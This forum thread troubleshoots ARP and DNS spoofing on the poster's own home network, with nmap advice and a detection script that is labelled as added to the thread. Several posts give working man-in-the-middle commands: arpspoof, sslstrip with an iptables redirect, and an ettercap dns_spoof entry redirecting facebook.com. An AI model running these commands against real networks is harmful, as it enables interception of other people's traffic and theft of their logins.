
Thread: Arp Blocked Against OSX

  1. #1 (Just burned his ISO; Join Date: Jun 2012; Posts: 4)

    Arp Blocked Against OSX

    Hi guys,
    I'm testing some attacks against the machines on my private network.
    I've got 1 XP machine, 1 Seven machine, 1 iPad, 1 MacBook Pro and 1 Android phone.
    In the last 2 days I stress tested these PCs with DNS spoofing (ettercap).
    Microsoft OS machines are completely "spoofable", but there's no way to redirect the traffic of the OSX and Android machines.
    Are there any special commands to run to complete an attack against non-Microsoft OS machines?

  2. #2 (Just burned his ISO; Join Date: Jun 2012; Posts: 5)

    Re: Arp Blocked Against OSX

    If you're on a switched LAN you can try with macof

  3. #3 maverik35 (Very good friend of the forum; Join Date: Sep 2009; Location: Debian land; Posts: 734)

    Re: Arp Blocked Against OSX

    I've been able to spoof Mac OSX on one occasion, and sniff... Also with Android cell phones...

    Have you tried nmap on these 2 devices to see what is at their ports?.. Need to see what is going on in those devices... Make a deep scan:

    nmap -sC -sS -sV -PN -p- -T4 -O --osscan-guess xxx.xxx.xxx.xxx,xxx (put here the IPs of the Mac OSX and the Android, e.g. 192.168.1.120,121) or one by one.

    ...It will take some time since it will scan not only the first 1024 ports and some high ports (nmap default), but all 65535 ports.

    Then analyze the info. There must be something listening on ports, some application or something avoiding the ARP poisoning.

    Also use arp -a and Wireshark to analyze the ports and the ARP protocol.

  4. #4 thorin (My life is this forum; Join Date: Jan 2010; Posts: 2,629)

    Re: Arp Blocked Against OSX

    @prelite
    Microsoft OS Machines are completely "spoofable" but there's no way to redirect traffic of OSX and android machines.
    Please be more specific. What did you try? What happened when you tried? etc.

    @all / @maverik35
    Just to simplify if you're going to do script scanning (-sC), version detection (-sV), and OS fingerprinting (-O) you may as well just use the -A switch and shorten things up:

    Code:
    nmap -sS -PN -p- -T4 -A --osscan-guess xxx.xxx.xxx.xxx,xxx
    Further since it's the OP's own network there's no reason to be at all polite in the timing: may as well use -T5, and chances are you don't need to resolve host names so save yourself some time by adding -n for no DNS resolution.

    Lastly while I believe -PN still works and will continue to for a number of future versions, you may want to start using -Pn as they're trying to be consistent across options and how things are enabled/disabled. (You can see from nmap --help this has been changed recently.)
    Last edited by thorin; 07-16-2012 at 08:34 AM.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  5. #5 (Just burned his ISO; Join Date: Jun 2012; Posts: 4)

    Re: Arp Blocked Against OSX

    First of all I want to thank you all for your answers.
    Please excuse me for writing back late, but last week I was on holiday.
    Please be more specific. What did you try? What happened when you tried? etc.
    Here is what I actually tried:
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000   # also tried with port 8080 or 443
    sslstrip -l 10000
    arpspoof -i wlan0 -t victimIP routerIP
    or this:

    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    locate etter.dns
    nano /usr/share/ettercap/etter.dns
    For example I put the following line in the file etter.dns:
    *.facebook.com	A	XXX.XXX.XXX.XXX
    ettercap -T -q -i wlan0 -P dns_spoof -M arp // //
    With arpspoof, sslstrip doesn't write anything in the log file, and with ettercap the victim OSX/Android PC/smartphone doesn't redirect the request for facebook.com to XXX.XXX.XXX.XXX.
    This instead is the result of the command "nmap -sC -sS -sV -PN -p- -T4 -O --osscan-guess xxx.xxx.xxx.xxx" launched against the OSX machine's IP.

    Code:
    Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-07-08 22:09 CEST
    Warning: 192.168.XXX.XXX giving up on port because retransmission cap hit (6).
    Nmap scan report for 192.168.XXX.XXX
    Host is up (0.0030s latency).
    All 65535 scanned ports on 192.168.XXX.XXX are closed (65484) or filtered (51)
    MAC Address: F0:B4:79:XX:YY:ZZ (Apple)
    Too many fingerprints match this host to give specific OS details
    Network Distance: 1 hop
    
    OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 717.49 seconds
    I'm all ears, guys.
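Added example, not part of the thread: before blaming sslstrip or etter.dns, the first thing to confirm is whether the poisoned ARP replies from arpspoof are reaching the victim at all, which is what maverik35's suggestion to look at arp -a and Wireshark comes down to. The script below parses raw Ethernet/ARP frames the way Wireshark's duplicate-address check does and reports every IP address claimed by more than one MAC, the on-wire signature of a successful or attempted poison. All frames, MAC and IP addresses are constructed for the example; the router, Mac victim and attacker roles follow the thread's setup, but none of the values come from the original posts. On a real capture you would feed it the frames from a pcap instead of SAMPLE_FRAMES.

```python
import struct
from collections import defaultdict

# Ethernet header: dst MAC, src MAC, EtherType. ARP body: htype, ptype, hlen, plen,
# opcode, sender MAC, sender IP, target MAC, target IP (RFC 826 layout).
ETH_HDR = struct.Struct("!6s6sH")
ARP_PKT = struct.Struct("!HHBBH6s4s6s4s")
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))


def ip_bytes(s):
    return bytes(int(x) for x in s.split("."))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp(eth_src, eth_dst, op, sha, spa, tha, tpa):
    """Build a raw Ethernet+ARP frame; used here only to construct sample traffic."""
    eth = ETH_HDR.pack(mac_bytes(eth_dst), mac_bytes(eth_src), ETHERTYPE_ARP)
    arp = ARP_PKT.pack(1, 0x0800, 6, 4, op, mac_bytes(sha), ip_bytes(spa),
                       mac_bytes(tha), ip_bytes(tpa))
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < ETH_HDR.size + ARP_PKT.size:
        return None
    dst, src, etype = ETH_HDR.unpack_from(frame, 0)
    if etype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = ARP_PKT.unpack_from(frame, ETH_HDR.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"eth_src": mac_str(src), "eth_dst": mac_str(dst), "op": op,
            "sha": mac_str(sha), "spa": ip_str(spa),
            "tha": mac_str(tha), "tpa": ip_str(tpa)}


def find_conflicts(frames):
    """Map each sender IP to the MACs that claimed it; return only IPs claimed by more than one MAC.

    That is the on-wire signature of ARP poisoning: the attacker's replies carry the
    router's IP with the attacker's MAC, alongside the router's own genuine replies.
    """
    claims = defaultdict(set)
    for frame in frames:
        arp = parse_arp(frame)
        if arp is None or arp["spa"] == "0.0.0.0":   # not ARP, or an ARP probe that claims nothing
            continue
        claims[arp["spa"]].add(arp["sha"])
    return {ip: sorted(macs) for ip, macs in claims.items() if len(macs) > 1}


# Constructed sample traffic (not a real capture). Roles follow the thread: a router,
# a Mac as the victim, and an attacker running arpspoof -t victim router.
ROUTER_IP, ROUTER_MAC = "192.168.1.1", "00:11:22:33:44:01"
VICTIM_IP, VICTIM_MAC = "192.168.1.120", "f0:b4:79:00:00:02"
ATTACKER_MAC = "00:0c:29:aa:bb:cc"
BROADCAST, ZERO_MAC = "ff:ff:ff:ff:ff:ff", "00:00:00:00:00:00"

SAMPLE_FRAMES = [
    # victim asks who has the router
    build_arp(VICTIM_MAC, BROADCAST, ARP_REQUEST, VICTIM_MAC, VICTIM_IP, ZERO_MAC, ROUTER_IP),
    # genuine reply from the router
    build_arp(ROUTER_MAC, VICTIM_MAC, ARP_REPLY, ROUTER_MAC, ROUTER_IP, VICTIM_MAC, VICTIM_IP),
    # unsolicited reply from the attacker claiming the router's IP (what arpspoof emits)
    build_arp(ATTACKER_MAC, VICTIM_MAC, ARP_REPLY, ATTACKER_MAC, ROUTER_IP, VICTIM_MAC, VICTIM_IP),
    # a short non-ARP frame, to show it is skipped rather than crashing the parser
    b"\x00" * 14 + b"not arp",
]

if __name__ == "__main__":
    for conflicting_ip, macs in find_conflicts(SAMPLE_FRAMES).items():
        print(f"{conflicting_ip} claimed by {len(macs)} MACs: {', '.join(macs)}")
```

How to read the result against the thread's problem: if the conflicting claims for the router's IP show up in a capture taken on the victim's side but arp -a on the Mac or Android device keeps showing the router's real MAC, the spoofed replies are arriving and the host is simply not honouring them; if they never appear on the victim's side of the wireless link at all, the fault is upstream of the host, not in sslstrip or the etter.dns entry.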

  6. #6 thorin (My life is this forum; Join Date: Jan 2010; Posts: 2,629)

    Re: Arp Blocked Against OSX

    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 --> Also tried with port 8080 or 443
    sslstrip -l 10000
    arpspoof -i wlan0 -t victimIP routerIP
    Someone correct me if I'm wrong ... I've never futzed with sslstrip but looking at this it seems like you're trying to take traffic which was destined for port 80 (regular HTTP not HTTPS) and send it to sslstrip ... what good is that?

  7. #7 (Just burned his ISO; Join Date: Jun 2012; Posts: 4)

    Re: Arp Blocked Against OSX

    Someone correct me if I'm wrong ... I've never futzed with sslstrip but looking at this it seems like you're trying to take traffic which was destined for port 80 (regular HTTP not HTTPS) and send it to sslstrip ...
    That's right, I'm trying to catch that kind of traffic, but with the Microsoft PC it works and with the OSX or Android machines it doesn't... why?
    Last edited by prelite; 07-13-2012 at 08:21 AM.

  8. #8 maverik35 (Very good friend of the forum; Join Date: Sep 2009; Location: Debian land; Posts: 734)

    Re: Arp Blocked Against OSX

    Quote Originally Posted by thorin
    @prelite
    Please be more specific. What did you try? What happened when you tried? etc.

    @all / @maverik35
    Just to simplify if you're going to do script scanning (-sC), version detection (-sV), and OS fingerprinting (-O) you may as well just use the -A switch and shorten things up:

    Code:
    nmap -sS -PN -p- -T4 -A --osscan-guess xxx.xxx.xxx.xxx,xxx
    Further since it's the OP's own network there's no reason to be at all polite in the timing: may as well use -T5, and chances are you don't need to resolve host names so save yourself some time by adding -n for no DNS resolution.

    Lastly while I believe -PN still works and will continue to for a number of future versions, you may want to start using -Pn as they're trying to be consistent across options and how things are enabled/disabled. (You can see from nmap --help this has been changed recently.)
    I do not agree with your statements. Why? When I first got to know about nmap, I watched a Metasploit video (4 videos); one of them was presented by the guy who wrote SET. In the video he uses the same as I did above. And I saw the Fyodor video using the -A option, which indeed included some options. Why does the other guy use all the parameters instead of doing it like Fyodor?... If that will make my nmap output have wrong info, I'd better use the -A option...

    Why use sslstrip -l 10000?.. It is the default, you do not need to do so.. But does it hurt?.. Redundant?... Does it work?... Yes, all of the above, as long as you know it is redundant, that it does not affect your output...

    What if I want to use DNS?.. It is important to me, perhaps not to you... It depends on people's own choice.

    What if I want to be polite in timing?.. Does it hurt?... If so, then let's get rid of -T1 to 4 and let's just use T5... For some reason all the parameters are available... Because we all can use them as we think works best for us.

    I use -sC because if there is a PC using ssh, you can see some important info... I do not have to use some script if not needed, I'm not obligated to use them just because I use -sC... As long as you know you can use scripts...

    Yours is the best way?...

    Not to me... Sure it is another way, yes.. But best?... Not to me...

  9. #9 thorin (My life is this forum; Join Date: Jan 2010; Posts: 2,629)

    Re: Arp Blocked Against OSX

    Quote Originally Posted by maverik35
    I do not agree with you in your statements. Why? IWhen I first got to know about nmap, I read a metasploit video (4 videos) one of them was explained by the guy who wrote the SET..In the video he uses the same as I did above..And I saw the Fyododr video using the -A option, which indeed included some options. Why the other guy uses all the parameters instead of doing it like Fyodor?...If that will make my nmap output to have wrong info, I better use the -A option...
    You're right, things never change or evolve in IT, why should you adapt or learn?

    Why use sslstrip -l 10000?..It is a default, you do not need to do so..But does it hurts?..Redundant?...Does it work?...Yes, all of the above, as long as you know it is redundant, that it does not affect your output...
    Did someone ask about that part? I musta missed it.

    What if I want to use DNS?..It is important to me, perhaps not to you...It depends on the people's own choice.
    Go for it, I never said you can't or shouldn't....I said "Further since it's the OP's own network ... chances are you don't need to resolve host names so save yourself some time by adding -n for no DNS resolution."

    If I want to be polite in timming?..Does it hurts?...If so, then let's get rid of -T1 to 4 and lets just use T5...For some reason there are all parameters available.. Because we all can use them as we think it can work best for us.
    Again I didn't say NOT to use it as you suggested, I said "Further since it's the OP's own network there's no reason to be at all polite in the timing: may as well use -T5".

    I use -sC because if there is a pC using ssh, you can see some important info...I do not have to use some script if not needed, I'm not obligated to use them just because I use -sC...As long as you know you can use scripts...
    AGAIN, I never said you couldn't use -sC, I was simply pointing out that you can simplify things as -A is the same as doing -O -sC -sV.

    Yours is the best way?...
    I never claimed it was, I was simply trying to streamline things for people and increase people's pool of knowledge. But again take the advice or don't it doesn't affect me in anyway.

    Not to me...Sure it is another way, yes..But best?...Not to me...
    Wow, you just keep going and going eh? Do it however you like. Some people like to increase their knowledge pool and learn new or different ways to do things, others just do things the same way all the time. I guess you do it the same way you saw it in some tutorial along the way, hopefully nothing will ever change, and it'll never fail to work how you originally learned it.

    BTW the word "best" doesn't appear in this thread until your post....
    Last edited by thorin; 07-16-2012 at 08:34 AM.

  10. #10 thorin (My life is this forum; Join Date: Jan 2010; Posts: 2,629)

    Re: Arp Blocked Against OSX

    Quote Originally Posted by prelite
    Quote Originally Posted by thorin
    Someone correct me if I'm wrong ... I've never futzed with sslstrip but looking at this it seems like you're trying to take traffic which was destined for port 80 (regular HTTP not HTTPS) and send it to sslstrip ...
    That's right, I'm trying to catch that kind of traffic but with the Microsoft PC it works and with the OSX or Android Machines doesn't...why?
    Well if you're taking regular HTTP not HTTPS traffic and sending it to sslstrip, what's it going to strip?
